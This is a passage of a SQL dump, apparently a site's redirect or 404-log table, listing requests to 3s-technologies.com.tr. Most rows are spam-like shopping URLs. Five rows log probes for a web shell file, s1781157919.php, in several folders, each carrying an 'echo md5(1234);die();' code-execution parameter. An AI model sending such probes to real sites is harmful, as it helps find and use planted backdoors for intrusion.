06:05:13','0000-00-00 00:00:00',301),(73851,'https://3s-technologies.com.tr/tr/shopping/impignoration/2183451905.html',NULL,'https://3s-technologies.com.tr/shopping/impignoration/2183451905.html','',1,0,'2026-06-11 06:05:16','0000-00-00 00:00:00',301),(73852,'https://3s-technologies.com.tr/tr/shopping/liquidise/335968861.html',NULL,'https://3s-technologies.com.tr/shopping/liquidise/335968861.html','',1,0,'2026-06-11 06:05:19','0000-00-00 00:00:00',301),(73853,'http://3s-technologies.com.tr/en/images/s1781157919.php?c=echo+md5(1234);die();',NULL,'','',1,0,'2026-06-11 06:05:21','0000-00-00 00:00:00',301),(73854,'https://3s-technologies.com.tr/tr/shopping/disdain/4183761982.html',NULL,'https://3s-technologies.com.tr/shopping/disdain/4183761982.html','',1,0,'2026-06-11 06:05:22','0000-00-00 00:00:00',301),(73855,'http://3s-technologies.com.tr/en/tmp/s1781157919.php?c=echo+md5(1234);die();',NULL,'','',1,0,'2026-06-11 06:05:22','0000-00-00 00:00:00',301),(73856,'http://3s-technologies.com.tr/en/media/s1781157919.php?c=echo+md5(1234);die();',NULL,'','',1,0,'2026-06-11 06:05:24','0000-00-00 00:00:00',301),(73857,'https://3s-technologies.com.tr/tr/shopping/forshape/3345171805.html',NULL,'https://3s-technologies.com.tr/shopping/forshape/3345171805.html','',1,0,'2026-06-11 06:05:25','0000-00-00 00:00:00',301),(73858,'http://3s-technologies.com.tr/en/templates/s1781157919.php?c=echo+md5(1234);die();',NULL,'','',1,0,'2026-06-11 06:05:25','0000-00-00 00:00:00',301),(73859,'http://3s-technologies.com.tr/en/modules/s1781157919.php?c=echo+md5(1234);die();',NULL,'','',1,0,'2026-06-11 06:05:27','0000-00-00 00:00:00',301),(73860,'https://3s-technologies.com.tr/tr/shopping/garggled/238834746.html',NULL,'https://3s-technologies.com.tr/shopping/garggled/238834746.html','',1,0,'2026-06-11 06:05:28','0000-00-00 00:00:00',301),(73861,'https://3s-technologies.com.tr/tr/shopping/vivific/3270541090.html',NULL,'https://3s-technologies.com.tr/shopping/vivific/3270541090.html','',1,0,'2026-06-11 06:05:31','0000-00-00 00:00:00',301),(73862,'https://3s-technologies.com.tr/tr/shopping/emancipate/3429194280.html',NULL,'https://3s-technologies.com.tr/shopping/emancipate/3429194280.html','',1,0,'2026-06-11 06:05:34','0000-00-00 00:00:00',301),(73863,'https://3s-technologies.com.tr/tr/shopping/gumptious/1938605292.html',NULL,'https://3s-technologies.com.tr/shopping/gumptious/1938605292.html','',1,0,'2026-06-11 06:05:37','0000-00-00 00:00:00',301),(73864,'https://3s-technologies.com.tr/tr/shopping/stearnsi/1235054192.html',NULL,'https://3s-technologies.com.tr/shopping/stearnsi/1235054192.html','',1,0,'2026-06-11 06:05:40','0000-00-00 00:00:00',301),(73865,'https://3s-technologies.com.tr/tr/shopping/economized/920278497.html',NULL,'https://3s-technologies.com.tr/shopping/economized/920278497.html','',1,0,'2026-06-11 06:05:43','0000-00-00 00:00:00',301),(73866,'https://3s-technologies.com.tr/tr/shopping/dustiest/1251360670.html',NULL,'https://3s-technologies.com.tr/shopping/dustiest/1251360670.html','',1,0,'2026-06-11 06:05:46','0000-00-00 00:00:00',301),(73867,'https://3s-technologies.com.tr/tr/shopping/catharticalness/579931173.html',NULL,'https://3s-technologies.com.tr/shopping/catharticalness/579931173.html','',1,0,'2026-06-11 06:05:49','0000-00-00 00:00:00',301),(73868,'https://3s-technologies.com.tr/tr/shopping/astrolater/2851013360.html',NULL,'https://3s-technologies.com.tr/shopping/astrolater/2851013360.html','',1,0,'2026-06-11 06:05:52','0000-00-00 00:00:00',301),(73869,'https://3s-technologies.com.tr/tr/shopping/earthiness/2969302333.html',NULL,'https://3s-technologies.com.tr/shopping/earthiness/2969302333.html','',1,0,'2026-06-11 06:05:59','0000-00-00 00:00:00',301),(73870,'https://3s-technologies.com.tr/tr/shopping/elizabethan/388754018.html',NULL,'https://3s-technologies.com.tr/shopping/elizabethan/388754018.html','',1,0,'2026-06-11 06:06:03','0000-00-00 00:00:00',301),(73871,'https://3s-technologies.com.tr/tr/shopping/leban/2430764852.html',NULL,'https://3s-technologies.com.tr/shopping/leban/2430764852.html','',1,0,'2026-06-11 06:06:06','0000-00-00 00:00:00',301),(73872,'https://3s-technologies.com.tr/tr/shopping/triquetra/2233647126.html',NULL,'https://3s-technologies.com.tr/shopping/triquetra/2233647126.html','',1,0,'2026-06-11 06:06:09','0000-00-00 00:00:00',301),(73873,'https://3s-technologies.com.tr/tr/shopping/gymnosperms/4001738635.html',NULL,'https://3s-technologies.com.tr/shopping/gymnosperms/4001738635.html','',1,0,'2026-06-11 06:06:12','0000-00-00 00:00:00',301),(73874,'https://3s-technologies.com.tr/tr/shopping/antimetabole/1612792805.html',NULL,'https://3s-technologies.com.tr/shopping/antimetabole/1612792805.html','',1,0,'2026-06-11 06:06:15','0000-00-00 00:00:00',301),(73875,'https://3s-technologies.com.tr/tr/shopping/sordine/2547464003.html',NULL,'https://3s-technologies.com.tr/shopping/sordine/2547464003.html','',1,0,'2026-06-11 06:06:18','0000-00-00 00:00:00',301),(73876,'https://3s-technologies.com.tr/tr/shopping/fissurellidae/1210340794.html',NULL,'https://3s-technologies.com.tr/shopping/fissurellidae/1210340794.html','',1,0,'2026-06-11 06:06:21','0000-00-00 00:00:00',301),(73877,'https://3s-technologies.com.tr/tr/shopping/gunnii/3905164078.html',NULL,'https://3s-technologies.com.tr/shopping/gunnii/3905164078.html','',1,0,'2026-06-11 06:06:24','0000-00-00 00:00:00',301),(73878,'https://3s-technologies.com.tr/tr/shopping/lettercard/1950715931.html',NULL,'https://3s-technologies.com.tr/shopping/lettercard/1950715931.html','',1,0,'2026-06-11 06:06:28','0000-00-00 00:00:00',301),(73879,'https://3s-technologies.com.tr/tr/shopping/accomplisher/1376403021.html',NULL,'https://3s-technologies.com.tr/shopping/accomplisher/1376403021.html','',1,0,'2026-06-11 06:06:30','0000-00-00 00:00:00',301),(73880,'https://3s-technologies.com.tr/tr/shopping/cynanchin/2281679972.html',NULL,'https://3s-technologies.com.tr/shopping/cynanchin/2281679972.html','',1,0,'2026-06-11 06:06:33','0000-00-00 00:00:00',301),(73881,'https://3s-technologies.com.tr/tr/shopping/synaeresis/2100894795.html',NULL,'https://3s-technologies.com.tr/shopping/synaeresis/2100894795.html','',1,0,'2026-06-11 06:06:36','0000-00-00 00:00:00',301),(73882,'https://3s-technologies.com.tr/tr/shopping/barbicanage/3304151929.html',NULL,'https://3s-technologies.com.tr/shopping/barbicanage/3304151929.html','',1,0,'2026-06-11 06:06:39','0000-00-00 00:00:00',301),(73883,'https://3s-technologies.com.tr/tr/shopping/mesopodialia/3961930858.html',NULL,'https://3s-technologies.com.tr/shopping/mesopodialia/3961930858.html','',1,0,'2026-06-11 06:06:42','0000-00-00 00:00:00',301),(73884,'https://3s-technologies.com.tr/tr/shopping/covenanter/1468830201.html',NULL,'https://3s-technologies.com.tr/shopping/covenanter/1468830201.html','',1,0,'2026-06-11 06:06:45','0000-00-00 00:00:00',301),(73885,'https://3s-technologies.com.tr/tr/shopping/hawberk/1204162184.html',NULL,'https://3s-technologies.com.tr/shopping/hawberk/1204162184.html','',1,0,'2026-06-11 06:06:48','0000-00-00 00:00:00',301),(73886,'https://3s-technologies.com.tr/tr/shopping/bulbose/2400921452.html',NULL,'https://3s-technologies.com.tr/shopping/bulbose/2400921452.html','',1,0,'2026-06-11 06:06:51','0000-00-00 00:00:00',301),(73887,'https://3s-technologies.com.tr/tr/shopping/welterweight/2315901046.html',NULL,'https://3s-technologies.com.tr/shopping/welterweight/2315901046.html','',1,0,'2026-06-11 06:06:54','0000-00-00 00:00:00',301),(73888,'https://3s-technologies.com.tr/tr/shopping/tetanomotor/1891784545.html',NULL,'https://3s-technologies.com.tr/shopping/tetanomotor/1891784545.html','',1,0,'2026-06-11 06:06:58','0000-00-00 00:00:00',301),(73889,'https://3s-technologies.com.tr/tr/shopping/sirbonian/190196950.html',NULL,'https://3s-technologies.com.tr/shopping/sirbonian/190196950.html','',1,0,'2026-06-11 06:07:01','0000-00-00 00:00:00',301),(73890,'https://3s-technologies.com.tr/tr/shopping/corporealist/1254737359.html',NULL,'https://3s-technologies.com.tr/shopping/corporealist/1254737359.html','',1,0,'2026-06-11 06:07:04','0000-00-00 00:00:00',301),(73891,'https://3s-technologies.com.tr/tr/shopping/carronades/3715362529.html',NULL,'https://3s-technologies.com.tr/shopping/carronades/3715362529.html','',1,0,'2026-06-11 06:07:07','0000-00-00 00:00:00',301),(73892,'https://3s-technologies.com.tr/tr/shopping/besmearing/3326095787.html',NULL,'https://3s-technologies.com.tr/shopping/besmearing/3326095787.html','',1,0,'2026-06-11 06:07:10','0000-00-00 00:00:00',301),(73893,'https://3s-technologies.com.tr/tr/shopping/dreary/827080613.html',NULL,'https://3s-technologies.com.tr/shopping/dreary/827080613.html','',1,0,'2026-06-11 06:07:13','0000-00-00 00:00:00',301),(73894,'https://3s-technologies.com.tr/tr/shopping/moreland/1990783284.html',NULL,'https://3s-technologies.com.tr/shopping/moreland/1990783284.html','',1,0,'2026-06-11 06:07:16','0000-00-00 00:00:00',301),(73895,'https://3s-technologies.com.tr/tr/shopping/archangelic/1635341613.html',NULL,'https://3s-technologies.com.tr/shopping/archangelic/1635341613.html','',1,0,'2026-06-11 06:07:19','0000-00-00 00:00:00',301),(73896,'https://3s-technologies.com.tr/tr/shopping/codetta/1198733246.html',NULL,'https://3s-technologies.com.tr/shopping/codetta/1198733246.html','',1,0,'2026-06-11 06:07:23','0000-00-00 00:00:00',301),(73897,'https://3s-technologies.com.tr/tr/shopping/functionary/960065226.html',NULL,'https://3s-technologies.com.tr/shopping/functionary/960065226.html','',1,0,'2026-06-11 06:07:25','0000-00-00 00:00:00',301),(73898,'https://3s-technologies.com.tr/tr/shopping/statutable/3058254019.html',NULL,'https://3s-technologies.com.tr/shopping/statutable/3058254019.html','',1,0,'2026-06-11 06:07:28','0000-00-00 00:00:00',301),(73899,'https://3s-technologies.com.tr/tr/shopping/fulltimer/170674586.html',NULL,'https://3s-technologies.com.tr/shopping/fulltimer/170674586.html','',1,0,'2026-06-11 06:07:31','0000-00-00 00:00:00',301),(73900,'https://3s-technologies.com.tr/tr/shopping/gadding/469905965.html',NULL,'https://3s-technologies.com.tr/shopping/gadding/469905965.html','',1,0,'2026-06-11 06:07:34','0000-00-00 00:00:00',301),(73901,'https://3s-technologies.com.tr/tr/shopping/crosspatch/2453474463.html',NULL,'https://3s-technologies.com.tr/shopping/crosspatch/2453474463.html','',1,0,'2026-06-11 06:07:37','0000-00-00 00:00:00',301),(73902,'https://3s-technologies.com.tr/tr/shopping/complementation/1879060951.html',NULL,'https://3s-technologies.com.tr/shopping/complementation/1879060951.html','',1,0,'2026-06-11 06:07:40','0000-00-00 00:00:00',301),(73903,'https://3s-technologies.com.tr/tr/shopping/scripta/2472386958.html',NULL,'https://3s-technologies.com.tr/shopping/scripta/2472386958.html','',1,0,'2026-06-11 06:07:43','0000-00-00 00:00:00',301),(73904,'https://3s-technologies.com.tr/tr/shopping/sequestering/8810456.html',NULL,'https://3s-technologies.com.tr/shopping/sequestering/8810456.html','',1,0,'2026-06-11 06:07:46','0000-00-00 00:00:00',301),(73905,'https://3s-technologies.com.tr/tr/shopping/floatplane/639464789.html',NULL,'https://3s-technologies.com.tr/shopping/floatplane/639464789.html','',1,0,'2026-06-11 06:07:51','0000-00-00 00:00:00',301),(73906,'https://3s-technologies.com.tr/tr/shopping/asserted/1834283082.html',NULL,'https://3s-technologies.com.tr/shopping/asserted/1834283082.html','',1,0,'2026-06-11 06:07:55','0000-00-00 00:00:00',301),(73907,'https://3s-technologies.com.tr/tr/shopping/selfadjusting/77867484.html',NULL,'https://3s-technologies.com.tr/shopping/selfadjusting/77867484.html','',1,0,'2026-06-11 06:07:59','0000-00-00 00:00:00',301),(73908,'https://3s-technologies.com.tr/tr/shopping/spatial/3916319506.html',NULL,'https://3s-technologies.com.tr/shopping/spatial/3916319506.html','',1,0,'2026-06-11 06:08:01','0000-00-00 00:00:00',301),(73909,'https://3s-technologies.com.tr/tr/shopping/authenticity/2501123790.html',NULL,'https://3s-technologies.com.tr/shopping/authenticity/2501123790.html','',1,0,'2026-06-11 06:08:08','0000-00-00 00:00:00',301),(73910,'https://3s-technologies.com.tr/tr/shopping/document/87208567.html',NULL,'https://3s-technologies.com.tr/shopping/document/87208567.html','',1,0,'2026-06-11 06:08:10','0000-00-00 00:00:00',301),(73911,'https://3s-technologies.com.tr/tr/shopping/espadrille/3278564.html',NULL,'https://3s-technologies.com.tr/shopping/espadrille/3278564.html','',1,0,'2026-06-11 06:08:14','0000-00-00 00:00:00',301),(73912,'https://3s-technologies.com.tr/tr/shopping/rapha/440094930.html',NULL,'https://3s-technologies.com.tr/shopping/rapha/440094930.html','',1,0,'2026-06-11 06:08:16','0000-00-00 00:00:00',301),(73913,'https://3s-technologies.com.tr/tr/shopping/floatfeed/52385629.html',NULL,'https://3s-technologies.com.tr/shopping/floatfeed/52385629.html','',1,0,'2026-06-11 06:08:19','0000-00-00 00:00:00',301),(73914,'https://3s-technologies.com.tr/tr/shopping/gamic/218445625.html',NULL,'https://3s-technologies.com.tr/shopping/gamic/218445625.html','',1,0,'2026-06-11 06:08:25','0000-00-00 00:00:00',301),(73915,'https://3s-technologies.com.tr/tr/shopping/hypertext/2948353654.html',NULL,'https://3s-technologies.com.tr/shopping/hypertext/2948353654.html','',1,0,'2026-06-11 06:08:27','0000-00-00 00:00:00',301),(73916,'https://3s-technologies.com.tr/tr/shopping/simplify/2752566158.html',NULL,'https://3s-technologies.com.tr/shopping/simplify/2752566158.html','',1,0,'2026-06-11 06:08:30','0000-00-00 00:00:00',301),(73917,'https://3s-technologies.com.tr/tr/shopping/practice/2669895418.html',NULL,'https://3s-technologies.com.tr/shopping/practice/2669895418.html','',1,0,'2026-06-11 06:08:33','0000-00-00 00:00:00',301),(73918,'https://3s-technologies.com.tr/tr/shopping/posts/2814922695.html',NULL,'https://3s-technologies.com.tr/shopping/posts/2814922695.html','',1,0,'2026-06-11 06:08:36','0000-00-00 00:00:00',301),(73919,'https://3s-technologies.com.tr/tr/shopping/loweringly/832313458.html',NULL,'https://3s-technologies.com.tr/shopping/loweringly/832313458.html','',1,0,'2026-06-11 06:08:39','0000-00-00 00:00:00',301),(73920,'https://3s-technologies.com.tr/tr/shopping/whethering/2335185490.html',NULL,'https://3s-technologies.com.tr/shopping/whethering/2335185490.html','',1,0,'2026-06-11 06:08:42','0000-00-00 00:00:00',301),(73921,'https://3s-technologies.com.tr/tr/shopping/bashed/1309682187.html',NULL,'https://3s-technologies.com.tr/shopping/bashed/1309682187.html','',1,0,'2026-06-11 06:08:45','0000-00-00 00:00:00',301),(73922,'https://3s-technologies.com.tr/tr/shopping/selfimparting/4133347610.html',NULL,'https://3s-technologies.com.tr/shopping/selfimparting/4133347610.html','',1,0,'2026-06-11 06:08:48','0000-00-00 00:00:00',301),(73923,'https://3s-technologies.com.tr/tr/shopping/virtueless/2309701436.html',NULL,'https://3s-technologies.com.tr/shopping/virtueless/2309701436.html','',1,0,'2026-06-11 06:08:53','0000-00-00 00:00:00',301),(73924,'https://3s-technologies.com.tr/tr/shopping/mesoblastic/1897017374.html',NULL,'https://3s-technologies.com.tr/shopping/mesoblastic/1897017374.html','',1,0,'2026-06-11 06:08:56','0000-00-00 00:00:00',301),(73925,'https://3s-technologies.com.tr/tr/shopping/sciography/3970540376.html',NULL,'https://3s-technologies.com.tr/shopping/sciography/3970540376.html','',1,0,'2026-06-11 06:08:59','0000-00-00 00:00:00',301),(73926,'https://3s-technologies.com.tr/tr/shopping/serpulae/3481719829.html',NULL,'https://3s-technologies.com.tr/shopping/serpulae/3481719829.html','',1,0,'2026-06-11 06:09:02','0000-00-00 00:00:00',301),(73927,'https://3s-technologies.com.tr/tr/shopping/culling/3291992828.html',NULL,'https://3s-technologies.com.tr/shopping/culling/3291992828.html','',1,0,'2026-06-11 06:09:05','0000-00-00 00:00:00',301),(73928,'https://3s-technologies.com.tr/tr/shopping/probality/447458177.html',NULL,'https://3s-technologies.com.tr/shopping/probality/447458177.html','',1,0,'2026-06-11 06:09:08','0000-00-00 00:00:00',301),(73929,'https://3s-technologies.com.tr/tr/shopping/polymerism/1004625314.html',NULL,'https://3s-technologies.com.tr/shopping/polymerism/1004625314.html','',1,0,'2026-06-11 06:09:11','0000-00-00 00:00:00',301),(73930,'https://3s-technologies.com.tr/tr/shopping/lagger/489078052.html',NULL,'https://3s-technologies.com.tr/shopping/lagger/489078052.html','',1,0,'2026-06-11 06:09:14','0000-00-00 00:00:00',301),(73931,'https://3s-technologies.com.tr/tr/shopping/tabularize/1096194263.html',NULL,'https://3s-technologies.com.tr/shopping/tabularize/1096194263.html','',1,0,'2026-06-11 06:09:17','0000-00-00 00:00:00',301),(73932,'https://3s-technologies.com.tr/tr/shopping/formulated/232985381.html',NULL,'https://3s-technologies.com.tr/shopping/formulated/232985381.html','',1,0,'2026-06-11 06:09:45','0000-00-00 00:00:00',301),(73933,'https://3s-technologies.com.tr/tr/shopping/filterable/2839017750.html',NULL,'https://3s-technologies.com.tr/shopping/filterable/2839017750.html','',1,0,'2026-06-11 06:09:47','0000-00-00 00:00:00',301),(73934,'https://3s-technologies.com.tr/tr/shopping/multifariousness/3695580557.html',NULL,'https://3s-technologies.com.tr/shopping/multifariousness/3695580557.html','',1,0,'2026-06-11 06:09:50','0000-00-00 00:00:00',301),(73935,'https://3s-technologies.com.tr/tr/shopping/remake/3016629209.html',NULL,'https://3s-technologies.com.tr/shopping/remake/3016629209.html','',1,0,'2026-06-11 06:09:53','0000-00-00 00:00:00',301),(73936,'https://3s-technologies.com.tr/tr/shopping/streamed/2556572972.html',NULL,'https://3s-technologies.com.tr/shopping/streamed/2556572972.html','',1,0,'2026-06-11 06:09:56','0000-00-00 00:00:00',301),(73937,'https://3s-technologies.com.tr/tr/shopping/testacea/497207068.html',NULL,'https://3s-technologies.com.tr/shopping/testacea/497207068.html','',1,0,'2026-06-11 06:09:59','0000-00-00 00:00:00',301),(73938,'https://3s-technologies.com.tr/tr/shopping/prefigured/498419167.html',NULL,'https://3s-technologies.com.tr/shopping/prefigured/498419167.html','',1,0,'2026-06-11 06:10:02','0000-00-00 00:00:00',301),(73939,'https://3s-technologies.com.tr/tr/shopping/medium/2749796602.html',NULL,'https://3s-technologies.com.tr/shopping/medium/2749796602.html','',1,0,'2026-06-11 06:10:05','0000-00-00 00:00:00',301),(73940,'https://3s-technologies.com.tr/tr/shopping/overstayed/82456272.html',NULL,'https://3s-technologies.com.tr/shopping/overstayed/82456272.html','',1,0,'2026-06-11 06:10:08','0000-00-00 00:00:00',301),(73941,'https://3s-technologies.com.tr/tr/shopping/clearest/1832118508.html',NULL,'https://3s-technologies.com.tr/shopping/clearest/1832118508.html','',1,0,'2026-06-11 06:10:12','0000-00-00 00:00:00',301),(73942,'https://3s-technologies.com.tr/tr/shopping/regularness/3743776926.html',NULL,'https://3s-technologies.com.tr/shopping/regularness/3743776926.html','',1,0,'2026-06-11 06:10:14','0000-00-00 00:00:00',301),(73943,'https://3s-technologies.com.tr/tr/shopping/transparently/4154847842.html',NULL,'https://3s-technologies.com.tr/shopping/transparently/4154847842.html','',1,0,'2026-06-11 06:10:17','0000-00-00 00:00:00',301),(73944,'https://3s-technologies.com.tr/tr/shopping/consternation/1660257593.html',NULL,'https://3s-technologies.com.tr/shopping/consternation/1660257593.html','',1,0,'2026-06-11 06:10:20','0000-00-00 00:00:00',301),(73945,'https://3s-technologies.com.tr/tr/shopping/inculpating/1977285453.html',NULL,'https://3s-technologies.com.tr/shopping/inculpating/1977285453.html','',1,0,'2026-06-11 06:10:23','0000-00-00 00:00:00',301),(73946,'https://3s-technologies.com.tr/tr/shopping/codefendant/624412237.html',NULL,'https://3s-technologies.com.tr/shopping/codefendant/624412237.html','',1,0,'2026-06-11 06:10:27','0000-00-00 00:00:00',301),(73947,'https://3s-technologies.com.tr/tr/shopping/vanning/763768908.html',NULL,'https://3s-technologies.com.tr/shopping/vanning/763768908.html','',1,0,'2026-06-11 06:10:29','0000-00-00 00:00:00',301),(73948,'https://3s-technologies.com.tr/tr/shopping/causable/3123368934.html',NULL,'https://3s-technologies.com.tr/shopping/causable/3123368934.html','',1,0,'2026-06-11 06:10:32','0000-00-00 00:00:00',301),(73949,'https://3s-technologies.com.tr/tr/shopping/snappishly/65713270.html',NULL,'https://3s-technologies.com.tr/shopping/snappishly/65713270.html','',1,0,'2026-06-11 06:10:35','0000-00-00 00:00:00',301),(73950,'https://3s-technologies.com.tr/tr/shopping/commodate/2331808801.html',NULL,'https://3s-technologies.com.tr/shopping/commodate/2331808801.html','',1,0,'2026-06-11 06:10:43','0000-00-00 00:00:00',301),(73951,'https://3s-technologies.com.tr/tr/shopping/upthrow/1345368301.html',NULL,'https://3s-technologies.com.tr/shopping/upthrow/1345368301.html','',1,0,'2026-06-11 06:10:45','0000-00-00 00:00:00',301),(73952,'https://3s-technologies.com.tr/tr/shopping/cavorted/694021587.html',NULL,'https://3s-technologies.com.tr/shopping/cavorted/694021587.html','',1,0,'2026-06-11 06:10:48','0000-00-00 00:00:00',301),(73953,'https://3s-technologies.com.tr/tr/shopping/escrow/153197836.html',NULL,'https://3s-technologies.com.tr/shopping/escrow/153197836.html','',1,0,'2026-06-11 06:10:51','0000-00-00 00:00:00',301),(73954,'https://3s-technologies.com.tr/tr/shopping/selfview/2217501467.html',NULL,'https://3s-technologies.com.tr/shopping/selfview/2217501467.html','',1,0,'2026-06-11 06:10:54','0000-00-00 00:00:00',301),(73955,'https://3s-technologies.com.tr/tr/shopping/rusticity/3114022916.html',NULL,'https://3s-technologies.com.tr/shopping/rusticity/3114022916.html','',1,0,'2026-06-11 06:10:57','0000-00-00 00:00:00',301),(73956,'https://3s-technologies.com.tr/tr/shopping/adjunctly/421242542.html',NULL,'https://3s-technologies.com.tr/shopping/adjunctly/421242542.html','',1,0,'2026-06-11 06:11:00','0000-00-00 00:00:00',301),(73957,'https://3s-technologies.com.tr/tr/shopping/intercision/1805546250.html',NULL,'https://3s-technologies.com.tr/shopping/intercision/1805546250.html','',1,0,'2026-06-11 06:11:03','0000-00-00 00:00:00',301),(73958,'https://3s-technologies.com.tr/tr/shopping/letup/1690164713.html',NULL,'https://3s-technologies.com.tr/shopping/letup/1690164713.html','',1,0,'2026-06-11 06:11:06','0000-00-00 00:00:00',301),(73959,'https://3s-technologies.com.tr/tr/shopping/triniunity/618569523.html',NULL,'https://3s-technologies.com.tr/shopping/triniunity/618569523.html','',1,0,'2026-06-11 06:11:12','0000-00-00 00:00:00',301),(73960,'https://3s-technologies.com.tr/tr/shopping/radicated/812310576.html',NULL,'https://3s-technologies.com.tr/shopping/radicated/812310576.html','',1,0,'2026-06-11 06:11:16','0000-00-00 00:00:00',301),(73961,'https://3s-technologies.com.tr/tr/shopping/poorjohn/152107433.html',NULL,'https://3s-technologies.com.tr/shopping/poorjohn/152107433.html','',1,0,'2026-06-11 06:11:19','0000-00-00 00:00:00',301),(73962,'https://3s-technologies.com.tr/tr/shopping/inquisitional/1886192052.html',NULL,'https://3s-technologies.com.tr/shopping/inquisitional/1886192052.html','',1,0,'2026-06-11 06:11:22','0000-00-00 00:00:00',301),(73963,'https://3s-technologies.com.tr/tr/shopping/please/4061045024.html',NULL,'https://3s-technologies.com.tr/shopping/please/4061045024.html','',1,0,'2026-06-11 06:11:25','0000-00-00 00:00:00',301),(73964,'https://3s-technologies.com.tr/tr/shopping/increate/3306918765.html',NULL,'https://3s-technologies.com.tr/shopping/increate/3306918765.html','',1,0,'2026-06-11 06:11:28','0000-00-00 00:00:00',301),(73965,'https://3s-technologies.com.tr/tr/shopping/nitrification/766324205.html',NULL,'https://3s-technologies.com.tr/shopping/nitrification/766324205.html','',1,0,'2026-06-11 06:11:31','0000-00-00 00:00:00',301),(73966,'https://3s-technologies.com.tr/tr/shopping/soothly/3572962388.html',NULL,'https://3s-technologies.com.tr/shopping/soothly/3572962388.html','',1,0,'2026-06-11 06:11:34','0000-00-00 00:00:00',301),(73967,'https://3s-technologies.com.tr/tr/shopping/deflection/1491869057.html',NULL,'https://3s-technologies.com.tr/shopping/deflection/1491869057.html','',1,0,'2026-06-11 06:11:37','0000-00-00 00:00:00',301),(73968,'https://3s-technologies.com.tr/tr/shopping/rewake/1139638337.html',NULL,'https://3s-technologies.com.tr/shopping/rewake/1139638337.html','',1,0,'2026-06-11 06:11:41','0000-00-00 00:00:00',301),(73969,'https://3s-technologies.com.tr/tr/shopping/combinatory/3052664262.html',NULL,'https://3s-technologies.com.tr/shopping/combinatory/3052664262.html','',1,0,'2026-06-11 06:11:43','0000-00-00 00:00:00',301),(73970,'https://3s-technologies.com.tr/tr/shopping/collocated/1013195741.html',NULL,'https://3s-technologies.com.tr/shopping/collocated/1013195741.html','',1,0,'2026-06-11 06:11:46','0000-00-00 00:00:00',301),(73971,'https://3s-technologies.com.tr/tr/shopping/fancywork/1334559076.html',NULL,'https://3s-technologies.com.tr/shopping/fancywork/1334559076.html','',1,0,'2026-06-11 06:11:49','0000-00-00 00:00:00',301),(73972,'https://3s-technologies.com.tr/tr/shopping/kernels/469560623.html',NULL,'https://3s-technologies.com.tr/shopping/kernels/469560623.html','',1,0,'2026-06-11 06:11:52','0000-00-00 00:00:00',301),(73973,'https://3s-technologies.com.tr/tr/shopping/capitularly/760523302.html',NULL,'https://3s-technologies.com.tr/shopping/capitularly/760523302.html','',1,0,'2026-06-11 06:11:55','0000-00-00 00:00:00',301),(73974,'https://3s-technologies.com.tr/tr/shopping/confided/3693415967.html',NULL,'https://3s-technologies.com.tr/shopping/confided/3693415967.html','',1,0,'2026-06-11 06:11:58','0000-00-00 00:00:00',301),(73975,'https://3s-technologies.com.tr/tr/shopping/decipiency/588662403.html',NULL,'https://3s-technologies.com.tr/shopping/decipiency/588662403.html','',1,0,'2026-06-11 06:12:01','0000-00-00 00:00:00',301),(73976,'https://3s-technologies.com.tr/tr/shopping/firedrake/498297455.html',NULL,'https://3s-technologies.com.tr/shopping/firedrake/498297455.html','',1,0,'2026-06-11 06:12:04','0000-00-00 00:00:00',301),(73977,'https://3s-technologies.com.tr/tr/shopping/gesticulation/4099690997.html',NULL,'https://3s-technologies.com.tr/shopping/gesticulation/4099690997.html','',1,0,'2026-06-11 06:12:09','0000-00-00 00:00:00',301),(73978,'https://3s-technologies.com.tr/tr/shopping/excursionist/325792499.html',NULL,'https://3s-technologies.com.tr/shopping/excursionist/325792499.html','',1,0,'2026-06-11 06:12:12','0000-00-00 00:00:00',301),(73979,'https://3s-technologies.com.tr/tr/shopping/favoringly/348240303.html',NULL,'https://3s-technologies.com.tr/shopping/favoringly/348240303.html','',1,0,'2026-06-11 06:12:15','0000-00-00 00:00:00',301),(73980,'https://3s-technologies.com.tr/tr/shopping/atween/460097796.html',NULL,'https://3s-technologies.com.tr/shopping/atween/460097796.html','',1,0,'2026-06-11 06:12:18','0000-00-00 00:00:00',301),(73981,'https://3s-technologies.com.tr/tr/shopping/contentedness/1468340296.html',NULL,'https://3s-technologies.com.tr/shopping/contentedness/1468340296.html','',1,0,'2026-06-11 06:12:21','0000-00-00 00:00:00',301),(73982,'https://3s-technologies.com.tr/tr/shopping/built/227786724.html',NULL,'https://3s-technologies.com.tr/shopping/built/227786724.html','',1,0,'2026-06-11 06:12:24','0000-00-00 00:00:00',301),(73983,'https://3s-technologies.com.tr/tr/shopping/creation/3675460882.html',NULL,'https://3s-technologies.com.tr/shopping/creation/3675460882.html','',1,0,'2026-06-11 06:12:27','0000-00-00 00:00:00',301),(73984,'https://3s-technologies.com.tr/tr/shopping/salamanders/1249754751.html',NULL,'https://3s-technologies.com.tr/shopping/salamanders/1249754751.html','',1,0,'2026-06-11 06:12:30','0000-00-00 00:00:00',301),(73985,'https://3s-technologies.com.tr/tr/shopping/enthronizing/525223905.html',NULL,'https://3s-technologies.com.tr/shopping/enthronizing/525223905.html','',1,0,'2026-06-11 06:12:33','0000-00-00 00:00:00',301),(73986,'https://3s-technologies.com.tr/tr/shopping/profuse/1635847758.html',NULL,'https://3s-technologies.com.tr/shopping/profuse/1635847758.html','',1,0,'2026-06-11 06:12:41','0000-00-00 00:00:00',301),(73987,'https://3s-technologies.com.tr/tr/shopping/partialist/4236446119.html',NULL,'https://3s-technologies.com.tr/shopping/partialist/4236446119.html','',1,0,'2026-06-11 06:12:45','0000-00-00 00:00:00',301),(73988,'https://3s-technologies.com.tr/tr/shopping/actaea/1293539232.html',NULL,'https://3s-technologies.com.tr/shopping/actaea/1293539232.html','',1,0,'2026-06-11 06:12:48','0000-00-00 00:00:00',301),(73989,'https://3s-technologies.com.tr/tr/shopping/lastery/4082545224.html',NULL,'https://3s-technologies.com.tr/shopping/lastery/4082545224.html','',1,0,'2026-06-11 06:12:51','0000-00-00 00:00:00',301),(73990,'https://3s-technologies.com.tr/tr/shopping/loxodromics/1663755994.html',NULL,'https://3s-technologies.com.tr/shopping/loxodromics/1663755994.html','',1,0,'2026-06-11 06:12:54','0000-00-00 00:00:00',301),(73991,'https://3s-technologies.com.tr/tr/shopping/thunderproof/3016792748.html',NULL,'https://3s-technologies.com.tr/shopping/thunderproof/3016792748.html','',1,0,'2026-06-11 06:12:57','0000-00-00 00:00:00',301),(73992,'https://3s-technologies.com.tr/tr/shopping/effuse/3363458334.html',NULL,'https://3s-technologies.com.tr/shopping/effuse/3363458334.html','',1,0,'2026-06-11 06:13:00','0000-00-00 00:00:00',301),(73993,'https://3s-technologies.com.tr/tr/shopping/limping/913637428.html',NULL,'https://3s-technologies.com.tr/shopping/limping/913637428.html','',1,0,'2026-06-11 